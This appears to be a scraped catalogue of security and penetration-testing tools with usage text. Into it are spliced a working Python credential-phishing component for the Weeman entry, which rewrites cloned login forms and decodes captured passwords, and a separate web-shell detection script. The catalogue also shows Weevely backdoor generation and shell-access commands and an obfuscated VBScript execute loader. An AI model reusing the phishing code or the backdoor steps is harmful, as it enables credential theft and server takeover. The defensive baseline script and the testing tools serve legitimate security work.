    ruby vanetools.rb --check-local-vulnerable-files /var/www/wordpress/
    


    Download Vane

    VBS-Obfuscator - VBScript obfuscation to allow PenTesters bypass countermeasures


    VBScript obfuscation to allow PenTesters bypass countermeasures.

    Sample Script Output
    C:\tools>python obfuscator.py test.vbs out.vbs
    Char 109 -> 5505-5396
    Char 115 -> 1113775/9685
    Char 103 -> 540853/5251
    Char 98 -> -2629+2727
    Char 111 -> 291-180
    Char 120 -> 826320/6886
    Char 32 -> 118016/3688
    Char 34 -> -2379+2413
    Char 72 -> 2401-2329
    Char 101 -> -1347+1448
    Char 108 -> 759780/7035
    Char 108 -> 5391-5283
    Char 111 -> 743700/6700
    Char 32 -> 7654-7622
    Char 87 -> 636927/7321
    Char 111 -> -46+157
    Char 114 -> 7591-7477
    Char 108 -> -9028+9136
    Char 100 -> 285800/2858
    Char 33 -> 5241-5208
    Char 34 -> 7209-7175
    Char 44 -> 234080/5320
    Char 32 -> 104352/3261
    Char 118 -> -3369+3487
    Char 98 -> -7575+7673
    Char 79 -> -9140+9219
    Char 107 -> 4317-4210
    Char 79 -> -5433+5512
    Char 110 -> -1294+1404
    Char 108 -> 6672-6564
    Char 121 -> 1109-988
    Char 32 -> 166080/5190
    Char 43 -> 95675/2225
    Char 32 -> 3156-3124
    Char 118 -> -9572+9690
    Char 98 -> -3093+3191
    Char 73 -> 53947/739
    Char 110 -> -2239+2349
    Char 102 -> 554982/5441
    Char 111 -> 4953-4842
    Char 114 -> 907440/7960
    Char 109 -> 3406-3297
    Char 97 -> 3570-3473
    Char 116 -> 3624-3508
    Char 105 -> 137130/1306
    Char 111 -> 632-521
    Char 110 -> 8712-8602
    Char 44 -> 94468/2147
    Char 32 -> 14176/443
    Char 34 -> 884/26
    Char 84 -> -9768+9852
    Char 104 -> -5195+5299
    Char 105 -> 706335/6727
    Char 115 -> 6469-6354
    Char 32 -> 250304/7822
    Char 105 -> -9605+9710
    Char 115 -> 771190/6706
    Char 32 -> -1319+1351
    Char 97 -> 674053/6949
    Char 32 -> -6907+6939
    Char 109 -> 3365-3256
    Char 101 -> 170791/1691
    Char 115 -> 17020/148
    Char 115 -> 3217-3102
    Char 97 -> -6948+7045
    Char 103 -> -9545+9648
    Char 101 -> 9670-9569
    Char 98 -> 926002/9449
    Char 111 -> 130869/1179
    Char 120 -> 255600/2130
    Char 34 -> -1384+1418
    Char 42 -> 1784-1742
    Done!
    

    Results (comparison)
    First output
    Dim SzVeVmXkoEZx, LALrsGQYjZtj, kLTOaGJfsmSG
    SzVeVmXkoEZx = "6974-6865*602140/5236*45732/444*-8743+8841*8842-8731*5179-5059*-4646+4678*892-858*5573-5501*129-28*9855-9747*-6681+6789*-9095+9206*257184/8037*311721/3583*-7211+7322*741684/6506*-5620+5728*241300/2413*198-165*-9925+9959*6380-6336*5552-5520*-9222+9340*569-471*-6484+6563*6988-6881*128533/1627*-5150+5260*4828-4720*5616-5495*6062-6030*5407-5364*313728/9804*-9272+9390*-767+865*3735-3662*-2705+2815*-4151+4253*73704/664*-9531+9645*-7310+7419*-1882+1979*3171-3055*9554-9449*2676-2565*-1012+1122*107448/2442*4055-4023*-6753+6787*2058-1974*-5464+5568*428610/4082*2479-2364*-3013+3045*-9195+9300*128225/1115*56448/1764*-6899+6996*161760/5055*253752/2328*756288/7488*-4081+4196*29900/260*-3164+3261*-6830+6933*-6580+6681*-8764+8862*861360/7760*330840/2757*-2407+2441"
    LALrsGQYjZtj = Split(SzVeVmXkoEZx, chr(eval(261366/6223)))
    for each SKhxsIKQEybA in LALrsGQYjZtj
    kLTOaGJfsmSG = kLTOaGJfsmSG & chr(eval(SKhxsIKQEybA))
    next
    execute(kLTOaGJfsmSG)
    
    Second output
    Dim wEQHvB, vsSBaV, pwgtko
    wEQHvB = "-1912+2021*168-53*938948/9116*5796-5698*666666/6006*938-818*-4889+4921*-9635+9669*302112/4196*-9587+9688*-4950+5058*1012608/9376*-6763+6874*235232/7351*-8833+8920*412920/3720*1007190/8835*594432/5504*-5605+5705*1113-1080*9516-9482*347644/7901*181536/5673*198712/1684*615734/6283*779-700*6051-5944*-2574+2653*172370/1567*2086-1978*681472/5632*4765-4733*-2746+2789*54880/1715*2593-2475*733040/7480*-5259+5332*-7261+7371*103326/1013*-8585+8696*7371-7257*6640-6531*4564-4467*-6527+6643*62265/593*-1349+1460*2314-2204*-5438+5482*-5860+5892*4779-4745*1086-1002*-265+369*1276-1171*2588-2473*-2914+2946*101850/970*698050/6070*181760/5680*3610-3513*236896/7403*5004-4895*4565-4464*720245/6263*812360/7064*3582-3485*36977/359*4691-4590*482944/4928*-773+884*546720/4556*5235-5201"
    vsSBaV = Split(wEQHvB, chr(eval(1039-997)))
    for each KxRKRt in vsSBaV
    pwgtko = pwgtko & chr(eval(KxRKRt))
    next
    execute(pwgtko)
    


    Download VBS-Obfuscator

    VBScan - A Black Box vBulletin Vulnerability Scanner


    VBScan is a black box vBulletin vulnerability scanner, written in Perl.

    Demo on YouTube: security bug found by VBScan in the Ubuntu, Fedora and Python forums.

    Report any bug to : me@reza.es

    Download VBScan

    WAIDPS - Wireless Auditing, Intrusion Detection & Prevention System


    WAIDPS is an open source wireless Swiss army knife written in Python that runs on Linux. It is a multipurpose tool designed for auditing (penetration testing) networks, detecting wireless intrusions (WEP/WPA/WPS attacks) and also for intrusion prevention (stopping a station from associating to an access point). Apart from these, it harvests all WiFi information in the surroundings and stores it in databases. This is useful when auditing a network whose access point is ‘MAC filtered’ or has a ‘hidden SSID’ and there is no client connected at that moment.

    WAIDPS may be useful to penetration testers, wireless trainers, law enforcement agencies and those who are interested in learning more about wireless auditing and protection. The primary purpose of this script is to detect intrusions. Once an attack is detected, it is displayed on screen and also logged to file. Additional features added to the current script that the previous WIDS did not have are:
    • automatically saves the attack packets into a file
    • interactive mode where users are allowed to perform many functions
    • allows the user to analyse captured packets
    • loads a previously saved pcap file, or any other pcap file, for examination
    • customizable filters
    • customizable detection threshold (sensitivity of the IDS)

    At present, WAIDPS is able to detect the following wireless attacks; other detections found in the previous WIDS will be added subsequently.
    • Association / Authentication flooding
    • Detect mass deauthentication which may indicate a possible WPA attack for handshake
    • Detect possible WEP attack using the ARP request replay method
    • Detect possible WEP attack using chopchop method
    • Detect possible WPS pin bruteforce attack by Reaver, Bully, etc.
    • Detection of Evil-Twin
    • Detection of Rogue Access Point

    The whole structure of the Wireless Auditing, Intrusion Detection & Prevention System will comprise:
    • Harvesting WiFi Information [Done]
    • Intrusion Detection [Partially Done]
    • Intrusion Prevention [Partially Done]
    • Auditing (Testing network) [Coming Soon]
    Other additional items include analysis of packets, display of captured dumps, display of a network bar chart and much more.

    Requirements
    No special equipment is required to use this script as long as you have the following :
    1. Root access (admin)
    2. Wireless interface which is capable of monitoring and injection
    3. Python 2.7 installed
    4. Aircrack-NG suite installed
    5. TShark installed
    6. TCPDump installed
    7. Mergecap installed (for joining pcap files)
    8. xterm  installed


    WakeMeOnLan v1.71 - Turn on computers on your network with Wake-on-LAN packet


    This utility allows you to easily turn on one or more computers remotely by sending Wake-on-LAN (WOL) packet to the remote computers.
    When your computers are turned on, WakeMeOnLan allows you to scan your network, and collect the MAC addresses of all your computers, and save the computers list into a file. Later, when your computers are turned off or in standby mode, you can use the stored computers list to easily choose the computer you want to turn on, and then turn on all these computers with a single click.
    WakeMeOnLan also allows you to turn on a computer from command-line, by specifying the computer name, IP address, or the MAC address of the remote network card.

    System Requirements And Limitations
    • On the computer that you run WakeMeOnLan: WakeMeOnLan works on any version of Windows, starting from Windows 2000 and up to Windows 8, including x64 versions of Windows.
    • On the remote computer: WakeMeOnLan can turn on the remote computer only if this feature is supported and enabled on the remote computer. Be aware that Wake-on-LAN feature only works on wired network. Wireless networks are not supported. 
      In order to enable the Wake-on-LAN feature on the remote computer:
      • On some computers, you may need to enable this feature on the BIOS setup.
      • In the network card properties, you should go to the 'Power Management' and/or 'Advanced' tabs of the network adapter, and turn on the Wake-on-LAN feature.  

    Start Using WakeMeOnLan
    WakeMeOnLan doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - WakeMeOnLan.exe
    After running WakeMeOnLan, the first thing to do is to scan your network and collect the MAC addresses/computer names/IP addresses on your network. In order to start the network scan, simply press F5. If WakeMeOnLan scans the wrong IP address range, you can stop the scan process by pressing F6, and then go to the 'Advanced Options' window (F9), and choose the correct IP address range to scan.
    All the computer information collected by WakeMeOnLan is saved into the configuration file (WakeMeOnLan.cfg) so that it is loaded the next time you use WakeMeOnLan. You can also scan your network multiple times, and if there are new computers on your network, they'll be added to the list. Scanning your network also updates the current status of every computer - 'on' (green icon) or 'off' (red icon). If there are obsolete computers on the list, you can remove them by using the 'Delete Selected Items' option.

    Turn On Remote Computers On Your Network
    After scanning your network for the first time, it's very easy to turn on the computers you need. Simply run WakeMeOnLan, select the desired computers, and then choose the 'Wake Up Selected Computer' option (F8).
    After using the 'Wake Up Selected Computer' option, you can run another network scan, to verify that the computers are really turned on. Turned on computers are displayed with green icon.

    External MAC Addresses File
    WakeMeOnLan uses an internal MAC Addresses database in order to display the company name of every network adapter. However, the internal database is not always updated with the latest MAC address assignments.
    You can manually download the latest MAC addresses file from http://standards-oui.ieee.org/oui.txt and then put oui.txt in the same folder where WakeMeOnLan.exe is located. When you run WakeMeOnLan.exe, it'll automatically load and use the external oui.txt instead of the internal MAC addresses database.

    Turn On a Computer From Command-Line
    WakeMeOnLan allows you to wake up a computer on your network without displaying any user interface, by using the /wakeup command-line option. You can specify the computer name, IP address, or the free user text that you typed in the properties window, as long as the computer information is stored inside the .cfg file. You can also specify the MAC address of the remote network card, even if the computer is not stored in the .cfg file.
    Optionally, you can specify the port number in the second parameter, and broadcast address in the third parameter.
    Examples:
    WakeMeOnLan.exe /wakeup 192.168.1.25
    WakeMeOnLan.exe /wakeup Comp01
    WakeMeOnLan.exe /wakeup Comp02
    WakeMeOnLan.exe /wakeup 40-65-81-A7-16-23
    WakeMeOnLan.exe /wakeup 406581A71623
    WakeMeOnLan.exe /wakeup Comp02 30000 192.168.0.255
    WakeMeOnLan.exe /wakeup 192.168.1.25 20000 192.168.1.255
    You can also wake up all computers in the list by using the /wakeupall command-line option. As with the /wakeup command-line option, you can optionally specify the port number and broadcast address.
    Examples:
    WakeMeOnLan.exe /wakeupall
    WakeMeOnLan.exe /wakeupall 20000 192.168.2.255
    If you want to wake up all computers in a specific IP address range, you can use the /wakeupiprange command-line option.
    Examples:
    WakeMeOnLan.exe /wakeupiprange 192.168.0.25 192.168.0.100
    WakeMeOnLan.exe /wakeupiprange 192.168.0.11 192.168.0.20 20000 192.168.0.255

    Scan Your Network From Command-Line
    WakeMeOnLan allows you to scan your network and update the computers list on the .cfg file without displaying any user interface, by using the /scan command-line option:
    WakeMeOnLan.exe /scan
    You can also specify specific IP addresses range to scan, for example:
    WakeMeOnLan.exe /scan /UseIPAddressesRange 1 /IPAddressFrom 192.168.1.1 /IPAddressTo 192.168.1.254 /UseNetworkAdapter 0

    More Command-Line Options
    /IPAddressFrom <IP Address>
    /IPAddressTo <IP Address>
    Specifies the IP address range to scan.
    /UseIPAddressesRange <0 | 1> Specifies whether to scan with specific IP addresses range (Specified in /IPAddressFrom and /IPAddressTo command-line options)
    0 = No, 1 = Yes
    /UseNetworkAdapter <0 | 1> Specifies whether to scan the IP addresses range of the specified adapter (/NetworkAdapter)
    0 = No, 1 = Yes
    /NetworkAdapter <Name> Specifies the network adapter name when /UseNetworkAdapter is 1
    /MacAddressFormat <1 | 2 | 3> Specifies the MAC address format to display:
    1 = XX-XX-XX-XX-XX-XX
    2 = XX:XX:XX:XX:XX:XX
    3 = XXXXXXXXXXXX
    /UseNetBios <0 | 1> Specifies whether to use NetBIOS scan.
    0 = No, 1 = Yes
    /cfg <Filename> Start WakeMeOnLan with the specified configuration file. For example:
    WakeMeOnLan.exe /cfg "c:\config\won.cfg"
    WakeMeOnLan.exe /cfg "%AppData%\WakeMeOnLan.cfg"
    /stext <Filename> Save the list of computers that you previously scanned into a simple text file.
    /stab <Filename> Save the list of computers that you previously scanned into a tab-delimited text file.
    /scomma <Filename> Save the list of computers that you previously scanned into a comma-delimited text file (csv).
    /stabular <Filename> Save the list of computers that you previously scanned into a tabular text file.
    /shtml <Filename> Save the list of computers that you previously scanned into HTML file (Horizontal).
    /sverhtml <Filename> Save the list of computers that you previously scanned into HTML file (Vertical).
    /sxml <Filename> Save the list of computers that you previously scanned into XML file.
    /sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Computer Name" and "Workgroup". You can specify the '~' prefix character (e.g: "~MAC Address") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
    WakeMeOnLan.exe /shtml "c:\temp\WakeMeOnLan.html" /sort 2 /sort ~1
    WakeMeOnLan.exe /shtml "c:\temp\WakeMeOnLan.html" /sort "Workgroup" /sort "Computer Name"
    /nosort When you specify this command-line option, the list will be saved without any sorting.     


    Download WakeMeOnLan v1.71

    Waldo - Multithreaded Directory and Subdomain Bruteforcer

    Waldo is a lightweight and multithreaded directory and subdomain bruteforcer implemented in Python. It can be used to locate hidden web resources and undiscovered subdomains of the specified target.

    Key Features
    • Quickly and easily generate a list of all subdomains of target domain
    • Discover hidden web resources that can be potentially leveraged as part of an attack
    • Written in Python and very portable
    • Fast, multithreaded design

    Setup
    Dependencies can be installed by running:
    $ pip install -r pip.req
    To run the waldo:
    $ python waldo.py
    Usage
    To enumerate subdomains at some-fake-site.example, execute the following:
    $ python waldo.py -m s -d some-fake-site.example
    To enumerate directories at some-fake-site.example, execute the following:
    $ python waldo.py -m d -d some-fake-site.example
    By default, output will be logged to waldo-output.txt. To specify a custom output file, use the -l flag:
    $ python waldo.py -m s -l my-log-file.txt -d some-fake-site.example
    Waldo uses 4 threads by default. To specify a custom threadpool size, use the -t flag:
    $ python waldo.py -m s -d some-fake-site.example -t 15


    Download Waldo

    WAP - Web Application Protection


    WAP is a source code static analysis and data mining tool to detect and correct input validation vulnerabilities in web applications written in PHP (version 4.0 or higher) with a low rate of false positives.

    WAP detects and corrects the following vulnerabilities:
    • SQL Injection (SQLI)
    • Cross-site scripting (XSS)
    • Remote File Inclusion (RFI)
    • Local File Inclusion (LFI)
    • Directory Traversal or Path Traversal (DT/PT)
    • Source Code Disclosure (SCD)
    • OS Command Injection (OSCI)
    • PHP Code Injection

    This tool semantically analyses the source code. More precisely, it does taint analysis (data-flow analysis) to detect the input validation vulnerabilities. The aim of the taint analysis is to track malicious inputs inserted by entry points ($_GET, $_POST arrays) and to verify if they reach some sensitive sink (PHP functions that can be exploited by malicious input). After the detection, the tool uses data mining to confirm if the vulnerabilities are real or false positives. At the end, the real vulnerabilities are corrected with the insertion of the fixes (small pieces of code) in the source code.
    WAP is written in Java and consists of three modules:

    • Code Analyzer: composed of the tree generator and the taint analyzer. The tool integrates a lexer and a parser generated by ANTLR from a grammar and a tree grammar written for the PHP language. The tree generator uses the lexer and the parser to build the AST (Abstract Syntax Tree) of each PHP file. The taint analyzer performs the taint analysis by navigating through the AST to detect potential vulnerabilities.

    • False Positives Predictor: composed of a supervised training data set, with instances classified as vulnerabilities or false positives, and of the Logistic Regression machine learning algorithm. For each potential vulnerability detected by the code analyzer, this module collects the presence of the attributes that define a false positive. The Logistic Regression algorithm then receives them and classifies the instance as a false positive or not (a real vulnerability).

    • Code Corrector: each real vulnerability is removed by correcting its source code. For the type of vulnerability, this module selects the fix that removes it and marks the places in the source code where the fix will be inserted. The code is then corrected by inserting the fixes, and new files are created.

    Download WAP

    Watcher v1.5.8 - Web Security Testing Tool and Passive Vulnerability Scanner


    Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems; it's completely safe to use in cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

    Major Features:
    1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
    2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
    3. Non-intrusive, will not raise alarms or damage production sites
    4. Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
    5. Configurable domains with wildcard support
    6. Extensible framework for adding new checks

    Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Fiddler provides all of the rich functionality of a good Web/HTTP proxy. With Fiddler you can capture all HTTP traffic, intercept and modify, replay requests, and much much more. Fiddler provides the HTTP proxy framework for Watcher to work in, allowing for seamless integration with today’s complex Web 2.0 or Rich Internet Applications. Watcher runs silently in the background while you drive your browser and interact with the Web-application.

    Watcher is built in C# as a small framework with 30+ checks already included. It's built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments. Examples of the types of issues Watcher will currently identify:
    • ASP.NET VIEWSTATE insecure configurations
    • JavaServer MyFaces ViewState without cryptographic protections
    • Cross-domain stylesheet and javascript references
    • User-controllable cross-domain references
    • User-controllable attribute values such as href, form action, etc.
    • User-controllable javascript events (e.g. onclick)
    • Cross-domain form POSTs
    • Insecure cookies which don't set the HTTPOnly or secure flags
    • Open redirects which can be abused by spammers and phishers
    • Insecure Flash object parameters useful for cross-site scripting
    • Insecure Flash crossdomain.xml
    • Insecure Silverlight clientaccesspolicy.xml
    • Charset declarations which could introduce vulnerability (non-UTF-8)
    • User-controllable charset declarations
    • Dangerous context-switching between HTTP and HTTPS
    • Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
    • Potential HTTP referer leaks of sensitive user-information
    • Potential information leaks in URL parameters
    • Source code comments worth a closer look
    • Insecure authentication protocols like Digest and Basic
    • SSL certificate validation errors
    • SSL insecure protocol issues (allowing SSL v2)
    • Unicode issues with invalid byte streams
    • Sharepoint insecurity checks
    • and more.

    Reducing false positives is a high priority, suggestions are welcome. Right now each check takes steps to reduce false positives, some better than others, and checks can be individually disabled if they’re generating too much noise.

    Release Notes

    Watcher.zip contains the two DLL's for manual installation of the plugin - drop them in your Fiddler2\Scripts user or program files folder.
    WatcherSetup.exe is an installer built with NSIS that will copy the two DLL's into either your Fiddler2\Scripts user or program files folder.
    WatcherTFS.zip contains the Team Foundation Server (TFS) component which Watcher uses to export results to TFS. Installation and further instructions are included in the ZIP file.

    Program: Watcher Passive Web Security Tool for Fiddler
    Version: 1.5.8
    Release: 25-June-2013
    License: Custom Open Source
    Authors: Chris Weber
    Testers: Chris Weber
    Contact: chris@casaba.com
    Website: http://websecuritytool.codeplex.com/
    Company: http://www.casaba.com/
    Copyright (c) 2010 - 2013 Casaba Security, LLC. All Rights Reserved.

    +++ major new feature
    + minor new feature
    * changed feature
    % improved performance or quality
    ! fixed minor bug
    !!! fixed major bug

    v1.5.8 2013-06-25
    ! Fixed bug in SSL certificate validation


    Download Watcher v1.5.8

    Web Security Dojo - Training Environment for Web Application Security Penetration Testing


    A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo

    What?
    Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v10.04.2, which is patched with the appropriate updates and VM additions for easy use.

    Why?
    The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for self-teaching and skill assessment, as well as training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started – tools, targets, and documentation.

    Feature Overview
    Targets include:
    • OWASP’s WebGoat
    • Google’s Gruyere
    • Damn Vulnerable Web App
    • Hacme Casino
    • OWASP InsecureWebApp
    • w3af’s test website
    • simple training targets by Maven Security (including REST and JSON)

    Tools: (starred = new this version)
    • Burp Suite (free version)
    • w3af
    • sqlmap
    • arachni *
    • metasploit
    • Zed Attack Proxy *
    • OWASP Skavenger
    • OWASP Dirbuster
    • Paros
    • Webscarab
    • Ratproxy
    • skipfish
    • websecurify
    • davtest
    • J-Baah
    • JBroFuzz
    • Watobo *
    • RATS
    • helpful Firefox add-ons

    Weeman - HTTP Server for Phishing


    HTTP server for phishing, written in Python. Weeman supports most of the biggest websites.
    Usually you will want to run Weeman together with a DNS spoofing attack (see dsniff, ettercap).

    Weeman will do the following steps:
    1. Create fake html page.
    2. Wait for clients
    3. Grab the data (POST).
    4. Try to login the client to the original page

    Requirements
    • Python 2 (2.7 or earlier; Python 3 is not supported).
    • Python BeautifulSoup 4

    Install BeautifulSoup
    • Archlinux - sudo pacman -S python2-beautifulsoup4
    • Ubuntu/Linuxmint - sudo apt-get install python-bs4
    • For another OS: - sudo pip install beautifulsoup4

    Platforms
    • Linux (any)
    • Mac (Not tested)
    • Windows (Not tested)
    [!] If weeman runs on your platform (Mac/Windows), please let me know.

    Usage
    Just type help

    Run server:
    • For port 80 you need to run Weeman as root!
    • Host to clone (e.g. www.social-networks.local)
      set url http://localhost
    • The form's submit target: view the site source and take the URL from <form action="TAKE THIS URL">
      set action_url http://localhost/sendlogin
    • The port the Weeman server will listen on
      set port 2020
    • Start the server
      run

    The settings will be saved for the next time you run weeman.py.
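    Steps 1 and 3 above (clone the page so its form posts to the local server, then grab the POST data) are the mechanical core of the tool. The following added example, written with the standard library rather than Weeman's BeautifulSoup code, shows that mechanism: every `<form action>` in a cloned page is pointed at a capture URL while the original absolute action is recorded for the later login attempt (step 4), and a captured form-encoded body is decoded. The hostnames, capture URL and sample HTML are constructed for the example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin


class FormRewriter(HTMLParser):
    """Re-emit an HTML document unchanged except that every <form action=...>
    now points at capture_url. The original absolute action of each form is
    recorded so a captured POST can later be replayed to the real site."""

    def __init__(self, base_url, capture_url):
        super().__init__(convert_charrefs=False)  # keep entities exactly as written
        self.base_url = base_url
        self.capture_url = capture_url
        self.out = []
        self.original_actions = []

    def handle_starttag(self, tag, attrs):
        if tag != "form":
            self.out.append(self.get_starttag_text())  # verbatim for every other tag
            return
        kept, action = [], ""
        for name, value in attrs:
            if name == "action":
                action = value or ""  # missing/empty action means "post to this page"
            else:
                kept.append((name, value))
        self.original_actions.append(urljoin(self.base_url, action))
        kept.append(("action", self.capture_url))
        rendered = " ".join(n if v is None else f'{n}="{escape(v, quote=True)}"'
                            for n, v in kept)
        self.out.append(f"<form {rendered}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def rewrite_forms(html_text, base_url, capture_url):
    """Return (rewritten_html, [original absolute form actions])."""
    p = FormRewriter(base_url, capture_url)
    p.feed(html_text)
    p.close()
    return "".join(p.out), p.original_actions


def parse_captured_post(body):
    """Decode an application/x-www-form-urlencoded POST body into a flat dict
    (first value per field): this is what ends up logged and replayed."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


if __name__ == "__main__":
    # Constructed login page of the site being cloned.
    page = ('<html><body><form method="POST" action="/sendlogin">'
            '<input name="user"><input name="pass" type="password"><br/></form>'
            '<p>x &amp; y</p></body></html>')
    out, actions = rewrite_forms(page, "http://www.social-networks.local/login", "http://localhost:2020/")
    print(out)
    print("original actions:", actions)
    print(parse_captured_post("user=alice&pass=s3cr%3Dt&remember="))
```

    The recorded original action is exactly the value the usage above asks you to read out of the site source and put into `set action_url`; the rewriter simply extracts it instead.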


    Download Weeman

    Weevely3 - Weaponized Web Shell

    Weevely is a command line web shell, dynamically extended over the network at runtime, designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.

    The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.

    Feature:
    • Shell/PHP telnet-like network terminal
    • Common server misconfigurations auditing
    • SQL console pivoting on target
    • HTTP traffic proxying through target
    • Mount target file system to local mount point
    • Conduct network scans pivoting on target
    • File upload and download
    • Spawn reverse and direct TCP shells
    • Bruteforce services accounts
    • Compress and decompress zip, gzip, bzip2 and tar archives

    The backdoor agent
    The remote agent is a very low footprint php script that receives dynamically injected code from the client, extending the client functionalities over the network at run-time. The agent code is polymorphic and hardly detectable by AV and HIDS. The communication is covered and obfuscated within the HTTP protocol using steganographic techniques.

    Modules development
    Weevely also provides a Python API which can be used to develop your own modules: internal audits, account enumerators, sensitive data scrapers, network scanners, modules that act as HTTP or SQL clients, and a whole lot of other things.

    Installation

    Linux
    The following example runs on Debian/Ubuntu-derived Linux environments with Python version 2.7.
    # Make sure that the python package manager and yaml libraries are installed
    $ sudo apt-get install g++ python-pip libyaml-dev python-dev
    # Install requirements
    $ sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

    OS X
    The following example runs on OS X with the Macports packaging system.
    $ sudo port install python27 py27-pip
    $ sudo port select --set pip pip27
    $ sudo port select --set python python27
    # Ideally, at this point you should install editline library (http://thrysoee.dk/editline/)
    # to have a working line completion in terminal. See issue #7 for more info.
    $ sudo pip install prettytable Mako PyYAML python-dateutil readline PySocks --upgrade

    Windows
    The following example runs on Microsoft Windows 7 with Python version 2.7, and likely on other Windows versions. First of all, install Python 2.7 and the pip package manager using ez_setup.py as explained in this guide.
    # Change into a folder from which pip.exe can be called (usually C:\Python27\Scripts\ if %PATH% is not set) and
    # install the following requirements
    > pip install prettytable Mako PyYAML python-dateutil pyreadline PySocks --upgrade

    Generate the backdoor agent

    The Weevely client communicates with the PHP agent installed on the target. Run ./weevely.py to print the help.
    $ ./weevely.py 
    [+] weevely 3.0
    [!] Error: too few arguments
    
    [+] Run terminal to the target
        weevely <URL> <password>
    
    [+] Load session file
        weevely session <path>
    
    [+] Generate backdoor agent
        weevely generate <password> <path>
    To generate a new agent, just use the generate option passing the password and path arguments.
    $ ./weevely.py generate mypassword agent.php
    Generated backdoor with password 'mypassword' in 'agent.php' of 1469 byte size.
    Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.

    Connect to the agent

    Launch weevely script to connect to the remote agent.
    $ ./weevely.py http://target/agent.php mypassword
    weevely> 
    The first prompt weevely> is not yet connected, so that users can set any useful pre-connection option (e.g. proxies to be used). Running a real command automatically starts the session on the remote target.
    weevely> ls
    agent.php
    index.html
    joomla-3.2.1
    www-data@target:/var/www $ cd ..
    www-data@target:/var/ $ whoami
    www-data
    www-data@target:/var/ $ uname -a
    Linux ubuntu 3.2.0-65-generic 99-Ubuntu SMP Fri Jul 4 21:04:27 UTC 2014 i686 i686 i386 GNU/Linux
    www-data@target:/var/ $
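    The agent description above is candid that the PHP script is polymorphic and unlikely to match AV or HIDS signatures, and the procedure just shown ends with a new agent.php sitting in the web root. The defender's counterpart is therefore not a signature but a baseline: record what the web root looked like when deployed and alert on any new or changed file the server would execute. The following is an added example of that check (not part of Weevely); the directory layout, file names and list of executable extensions are constructed for the example, and the baseline must be stored off the host, since an attacker who can write the web root can also rewrite a manifest kept next to it.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path

# Extensions a typical Apache/PHP install hands to the interpreter. Assumed for the
# example; check your own handler configuration (.htaccess can add more).
EXECUTABLE_SUFFIXES = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".inc"}


def build_manifest(root):
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def diff_manifests(baseline, current):
    """Return added/removed/modified relative paths between two manifests."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def executable_changes(diff):
    """Narrow a diff to what the web server could execute: new or modified scripts.
    A new script under a directory the application writes to is the classic web-shell sign."""
    return sorted(p for p in diff["added"] + diff["modified"]
                  if Path(p).suffix.lower() in EXECUTABLE_SUFFIXES)


def save_manifest(manifest, path):
    Path(path).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(path):
    return json.loads(Path(path).read_text())


def demo():
    """Constructed web root: take a baseline, then drop an agent and modify a file."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    try:
        (root / "index.html").write_text("<h1>site</h1>")
        (root / "joomla-3.2.1").mkdir()
        (root / "joomla-3.2.1" / "index.php").write_text("<?php echo 'ok';")
        baseline = build_manifest(root)
        (root / "agent.php").write_text("<?php /* dropped later */")           # new script
        (root / "joomla-3.2.1" / "index.php").write_text("<?php echo 'changed';")  # modified script
        (root / "robots.txt").write_text("User-agent: *")                      # new, not executable
        diff = diff_manifests(baseline, build_manifest(root))
        return diff, executable_changes(diff)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    diff, execs = demo()
    print("diff:", diff)
    print("executable changes:", execs)
```

    Run build_manifest at deployment time, keep the JSON away from the web server, and run the diff from a cron job or your configuration-management tool; legitimate deployments regenerate the baseline, everything else is an incident.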


    Download Weevely3

    Wfuzz - The Web Application Bruteforcer


